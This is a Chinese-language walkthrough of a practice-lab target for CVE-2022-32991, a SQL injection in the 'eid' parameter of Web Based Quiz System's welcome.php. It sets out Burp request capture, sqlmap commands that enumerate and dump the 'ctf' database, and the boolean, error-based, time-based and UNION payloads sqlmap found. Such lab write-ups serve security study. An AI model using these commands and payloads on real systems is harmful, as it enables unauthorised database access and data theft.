介绍
在Web Based Quiz System 1.0 中曾发现分类为致命的漏洞。此漏洞会影响某些未知进程文件welcome.php。手动调试的软件参数:eid不合法输入可导致 SQL注入。漏洞的CWE定义是 CWE-89。此漏洞的脆弱性 2022-06-15所披露。阅读公告的网址是yuque.com。
该漏洞被标识为CVE-2022-32991, CVE分配信息格式:2022-06-13。攻击可能远程发起, 有技术细节可用。该漏洞的知名度低于平均水平, 没有可利用漏洞。当前漏洞利用的价值为美元大约是$0-$5k 。根据MITRE ATT&CK,此问题部署的攻击技术是T1505。
后有源码下载地址
靶场环境
使用春秋云境平台,主页→漏洞靶标→免费空间→CVE-2022-32991
工具:
-
Burpsuite
-
Sqlmap
-
浏览器
渗透测试
1、已知信息
该系统在welcome.php 存在sql注入漏洞
2、系统页面
访问靶场链接,首页需要登陆
3.注册系统
按照要求进行注册,注册后即可登录系统
4.登陆系统
登陆后跳转到如下url:
http://eci-2ze7j3wqd7sbo75y7fg4.cloudeci1.ichunqiu.com/welcome.php?q=1>
页面如下所示
5.尝试注入
登陆后进入到页面welcpm.php 同时参数为q,尝试进行注入,但是发现该参数并不存在注入
根据cve漏洞信息,可以知道造成注入的参数为eid,于是尝试寻找注入点。
在上图的页面,点击start按钮跳转新页面如下
地址为:
http://eci-2ze7j3wqd7sbo75y7fg4.cloudeci1.ichunqiu.com/welcome.php?q=quiz&step=2&eid=5b141f1e8399e&n=1&t=10
即位存在sql注入的地方
6.通过burp抓包保存
因为访问welcome.php页面会校验登陆,所以注入时要带着cookie,于是通过burp抓包。
浏览器代理到burp,找到该url的包,然后右键保存到文件,方便通过sqlmap跑注入。
7.sqlmap进行注入
注入获取数据库
sqlmap -r 1.txt --dbs
payload为:
Parameter: eid (GET)Type: boolean-based blindTitle: AND boolean-based blind - WHERE or HAVING clausePayload: q=quiz&step=2&eid=5b141f1e8399e' AND 7643=7643 AND 'RWYY'='RWYY&n=1&t=10Type: error-basedTitle: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)Payload: q=quiz&step=2&eid=5b141f1e8399e' OR (SELECT 7695 FROM(SELECT COUNT(*),CONCAT(0x717a6b7a71,(SELECT (ELT(7695=7695,1))),0x7170707171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'uLzc'='uLzc&n=1&t=10Type: time-based blindTitle: MySQL >= 5.0.12 AND time-based blind (query SLEEP)Payload: q=quiz&step=2&eid=5b141f1e8399e' AND (SELECT 4331 FROM (SELECT(SLEEP(5)))PRxs) AND 'kzHJ'='kzHJ&n=1&t=10Type: UNION queryTitle: Generic UNION query (NULL) - 5 columnsPayload: q=quiz&step=2&eid=5b141f1e8399e' UNION ALL SELECT NULL,NULL,CONCAT(0x717a6b7a71,0x4362467a7358484b78694e774b646943474e6d6c7a626e625273456e676444476778796f4262466d,0x7170707171),NULL,NULL-- -&n=1&t=10
获得数据库信息,再注入查询ctf数据库中的表信息
sqlmap -r 1.txt --tables -D ctfpayload为:
Parameter: eid (GET)Type: boolean-based blindTitle: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)Payload: q=quiz&step=2&eid=-9834' OR 1094=1094#&n=1&t=34Type: error-basedTitle: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)Payload: q=quiz&step=2&eid=60377db362694' OR (SELECT 8050 FROM(SELECT COUNT(*),CONCAT(0x717a6a7a71,(SELECT (ELT(8050=8050,1))),0x716b627a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- CMZh&n=1&t=34Type: time-based blindTitle: MySQL >= 5.0.12 AND time-based blind (query SLEEP)Payload: q=quiz&step=2&eid=60377db362694' AND (SELECT 3662 FROM (SELECT(SLEEP(5)))aGCQ)-- WCoo&n=1&t=34
查询列信息
sqlmap -r 1.txt --columns -T flag -D ctfParameter: eid (GET)Type: boolean-based blindTitle: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)Payload: q=quiz&step=2&eid=-9834' OR 1094=1094#&n=1&t=34Type: error-basedTitle: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)Payload: q=quiz&step=2&eid=60377db362694' OR (SELECT 8050 FROM(SELECT COUNT(*),CONCAT(0x717a6a7a71,(SELECT (ELT(8050=8050,1))),0x716b627a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- CMZh&n=1&t=34Type: time-based blindTitle: MySQL >= 5.0.12 AND time-based blind (query SLEEP)Payload: q=quiz&step=2&eid=60377db362694' AND (SELECT 3662 FROM (SELECT(SLEEP(5)))aGCQ)-- WCoo&n=1&t=34
最后查询数据
sqlmap -r 1.txt --dump -C flag -T flag -D ctfpayload:
Parameter: eid (GET)Type: boolean-based blindTitle: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)Payload: q=quiz&step=2&eid=-9834' OR 1094=1094#&n=1&t=34Type: error-basedTitle: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)Payload: q=quiz&step=2&eid=60377db362694' OR (SELECT 8050 FROM(SELECT COUNT(*),CONCAT(0x717a6a7a71,(SELECT (ELT(8050=8050,1))),0x716b627a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- CMZh&n=1&t=34Type: time-based blindTitle: MySQL >= 5.0.12 AND time-based blind (query SLEEP)Payload: q=quiz&step=2&eid=60377db362694' AND (SELECT 3662 FROM (SELECT(SLEEP(5)))aGCQ)-- WCoo&n=1&t=34
代码分析
源码文件:(请关注公众号,后续更多分享~)
https://drive.google.com/file/d/1Tv_Se21Vni5E3CL0Rv8Usm2g9nKX8SU7/view?usp=drive_link
根据注入点页面的参数
GET /welcome.php?q=quiz&step=2&eid=60377db362694&n=1&t=34 HTTP/1.1
定位到welcome.php 91行开始的代码,存在sql语句拼接,造成的sql注入,如下图
来玩
欢迎进群吹水交流~~~
原文始发于微信公众号(赛博之眼CyberEye):【靶场】WP+漏洞分析 | Web Based Quiz System SQL注入(CVE-2022-32991)
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论